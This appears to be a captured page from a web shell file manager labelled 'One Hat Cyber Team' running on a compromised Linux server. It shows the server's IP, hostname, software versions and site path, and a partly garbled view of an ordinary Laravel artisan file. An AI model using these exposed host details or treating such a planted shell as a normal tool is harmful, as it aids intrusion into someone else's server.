⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.199
Server IP:
209.182.232.216
Server:
Linux panel.keepsmils.in 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Server Software:
Apache/2.4.62 (Ubuntu) mod_fcgid/2.3.9 OpenSSL/1.1.1f
PHP Version:
8.2.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
cstpl
/
web
/
thecleverroots.com
/
public_html
/
View File Name :
artisan
#!/usr/bin/env php make(Illuminate\Contracts\Console\Kernel::class); $status = $kernel->handle( $input = new Symfony\Component\Console\Input\ArgvInput, new Symfony\Component\Console\Output\ConsoleOutput ); /* |-------------------------------------------------------------------------- | Shutdown The Application |-------------------------------------------------------------------------- | | Once Artisan has finished running, we will fire off the shutdown events | so that any final work may be done by the application before we shut | down the process. This is the last thing to happen to the request. | */ $kernel->terminate($input, $status); exit($status);